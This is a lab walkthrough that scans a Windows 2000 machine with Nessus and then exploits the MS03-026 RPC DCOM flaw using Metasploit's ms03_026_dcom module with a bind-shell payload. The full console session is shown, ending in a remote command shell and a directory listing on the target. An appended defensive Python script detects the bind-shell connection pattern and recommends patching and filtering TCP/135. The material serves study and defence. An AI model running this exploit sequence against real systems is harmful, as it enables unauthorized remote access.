1. Scan the Windows 2000 machine with Nessus; several high-risk vulnerabilities are reported,
for example: MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)
Then open msfconsole:
msf > search ms03-026
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.26.33.111 yes The target address
RPORT 135 yes The target port (TCP)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.26.33.111 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800
C:\WINNT\system32>d:
d:
D:\>dir
dir
 驱动器 D 中的卷是 ZRMPSEL_CN
 卷的序列号是 EAB5-D65E
 D:\ 的目录
2003-06-26 20:00 45 AUTORUN.INF
2003-06-26 20:00 <DIR> BOOTDISK
2003-06-26 20:00 304,624 BOOTFONT.BIN
2003-06-26 20:00 0 CDROMSP4.TST
2003-06-26 20:00 5 CDROM_IP.5
2003-06-26 20:00 5 CDROM_NT.5
2003-06-26 20:00 <DIR> DISCOVER
2003-06-26 20:00 <DIR> I386
2003-06-26 20:00 12,354 READ1ST.TXT
2003-06-26 20:00 465,408 README.DOC
2003-06-26 20:00 358,160 SETUP.EXE
2003-06-26 20:00 <DIR> SETUPTXT
2003-06-26 20:00 18,173 SPNOTES.HTM
2003-06-26 20:00 <DIR> SUPPORT
2003-06-26 20:00 <DIR> VALUEADD
               9 个文件      1,158,774 字节
               6 个目录              0 可用字节
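As an added defensive example (not code from the original post or from Metasploit), the following Python script looks for the network trace the session above leaves behind: a client connecting to TCP/135 on a host and, seconds later, connecting to an unexpected port on the same host (here the payload's LPORT 4444). The firewall-style log format and the addresses are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed firewall-style connection log (not from the original page). It mirrors the
# session above: 10.26.30.41 binds to RPC on TCP/135, then reaches the bind shell on 4444.
SAMPLE_LOG = """\
2018-12-11 19:33:20 ACCEPT 10.26.30.41:36670 -> 10.26.33.111:135 TCP
2018-12-11 19:33:22 ACCEPT 10.26.30.41:36671 -> 10.26.33.111:135 TCP
2018-12-11 19:33:33 ACCEPT 10.26.30.41:36675 -> 10.26.33.111:4444 TCP
2018-12-11 19:40:01 ACCEPT 10.26.30.50:50012 -> 10.26.33.120:135 TCP
2018-12-11 19:40:02 ACCEPT 10.26.30.50:50013 -> 10.26.33.120:445 TCP
"""

LINE_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) ACCEPT "
    r"(\d+\.\d+\.\d+\.\d+):\d+ -> (\d+\.\d+\.\d+\.\d+):(\d+) TCP$"
)
RPC_PORT = 135
# Ports a host may legitimately be contacted on shortly after an RPC connection.
EXPECTED_PORTS = {135, 139, 445, 80, 443, 3389}
WINDOW = timedelta(seconds=60)


def parse_line(line):
    """Return (timestamp, src_ip, dst_ip, dst_port), or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            m.group(2), m.group(3), int(m.group(4)))


def find_rpc_then_bind(log_text, window=WINDOW):
    """Flag (src, dst, port, time) where src reaches dst on TCP/135 and then, within
    `window`, connects to an unexpected port on the same dst: the bind-shell pattern."""
    last_rpc = {}  # (src, dst) -> time of the most recent TCP/135 connection
    alerts = []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ts, src, dst, dport = rec
        if dport == RPC_PORT:
            last_rpc[(src, dst)] = ts
            continue
        if dport in EXPECTED_PORTS:
            continue
        seen = last_rpc.get((src, dst))
        if seen is not None and timedelta(0) <= ts - seen <= window:
            alerts.append((src, dst, dport, ts.strftime("%Y-%m-%d %H:%M:%S")))
    return alerts


print(find_rpc_then_bind(SAMPLE_LOG))
```

The Nessus finding is the primary signal; the durable fix is applying the MS03-026 / MS03-039 patches (823980 / 824146), and filtering TCP/135 at the network boundary removes the path the session above depends on.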